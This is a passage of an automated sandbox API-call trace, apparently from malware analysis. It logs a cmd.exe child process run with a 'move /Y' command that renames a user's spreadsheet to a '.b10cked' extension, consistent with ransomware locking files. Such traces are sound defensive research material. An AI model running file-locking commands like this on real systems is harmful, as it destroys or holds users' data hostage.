lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.887] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.887] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, 
lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] GetFileType (hFile=0x4c) returned 0x1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.887] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] GetFileType (hFile=0x4c) returned 0x1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.888] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x32, lpOverlapped=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] GetFileType (hFile=0x4c) returned 0x1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] GetFileType (hFile=0x4c) returned 0x1 [0140.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.888] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x32, lpOverlapped=0x0) returned 1 [0140.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.888] _close (_FileHandle=4) returned 0 [0140.888] FindNextFileW (in: hFindFile=0x3f0e70, lpFindFileData=0x28ee4c | out: lpFindFileData=0x28ee4c) returned 0 [0140.889] GetLastError () returned 0x12 [0140.889] FindClose (in: 
hFindFile=0x3f0e70 | out: hFindFile=0x3f0e70) returned 1 [0140.889] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.890] _close (_FileHandle=3) returned 0 [0140.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.890] SetConsoleInputExeNameW () returned 0x1 [0140.890] GetConsoleOutputCP () returned 0x1b5 [0140.891] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.891] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.891] exit (_Code=0) Process: id = "160" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14711 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14712 start_va = 0x30000 end_va 
= 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14713 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14714 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14715 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14716 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14717 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14718 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14719 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 14720 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15238 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15239 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15240 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" 
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15241 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15242 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 15243 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15244 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15245 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15246 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15247 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15248 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15249 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: 
id = 15250 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15280 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 15281 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15282 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15283 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15284 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15285 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 15286 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 15287 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 15288 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 15289 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000001140000" filename = "" Thread: id = 217 os_tid = 0xd98 [0139.443] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f91c | out: lpSystemTimeAsFileTime=0x18f91c*(dwLowDateTime=0x8d0d5960, dwHighDateTime=0x1d440a9)) [0139.443] GetCurrentProcessId () returned 0xde4 [0139.443] GetCurrentThreadId () returned 0xd98 [0139.443] GetTickCount () returned 0x2bda3 [0139.443] QueryPerformanceCounter (in: lpPerformanceCount=0x18f914 | out: lpPerformanceCount=0x18f914*=19623249505) returned 1 [0139.444] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.444] __set_app_type (_Type=0x1) [0139.444] __p__fmode () returned 0x76b331f4 [0139.444] __p__commode () returned 0x76b331fc [0139.444] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.444] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.444] GetCurrentThreadId () returned 0xd98 [0139.444] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38 [0139.444] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.444] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.444] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8ac | out: phkResult=0x18f8ac*=0x0) returned 0x2 [0139.462] VirtualQuery (in: lpAddress=0x18f8e3, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: 
lpAddress=0x90000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f87c, dwLength=0x1c | out: lpBuffer=0x18f87c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.462] GetConsoleOutputCP () returned 0x1b5 [0139.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.466] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.466] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.470] GetEnvironmentStringsW () returned 0x3001b0* [0139.471] FreeEnvironmentStringsW 
(penv=0x3001b0) returned 1 [0139.471] GetEnvironmentStringsW () returned 0x3001b0* [0139.471] FreeEnvironmentStringsW (penv=0x3001b0) returned 1 [0139.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e81c | out: phkResult=0x18e81c*=0x40) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0xe8, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x0, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x40, 
lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegCloseKey (hKey=0x40) returned 0x0 [0139.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e81c | out: phkResult=0x18e81c*=0x40) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x0, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x9, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x9, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x9, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.472] RegCloseKey (hKey=0x40) 
returned 0x0 [0139.472] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.472] srand (_Seed=0x5b88636e) [0139.472] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"" [0139.472] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"" [0139.472] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.472] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.472] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.472] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.472] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.472] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.472] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.472] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.472] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.472] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.472] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0139.472] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.473] GetEnvironmentStringsW () returned 0x302300* [0139.473] FreeEnvironmentStringsW (penv=0x302300) returned 1 [0139.473] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.473] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.473] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.473] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.473] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.473] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.473] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.473] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.473] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.473] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.473] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5e8, lpFilePart=0x18f5e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5e4*="Desktop") returned 0x18 [0139.473] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.473] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f364 | out: lpFindFileData=0x18f364) returned 0x300040 [0139.473] FindClose (in: hFindFile=0x300040 | out: hFindFile=0x300040) returned 1 [0139.473] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f364 | out: lpFindFileData=0x18f364) returned 0x300040 [0139.473] FindClose (in: hFindFile=0x300040 | out: 
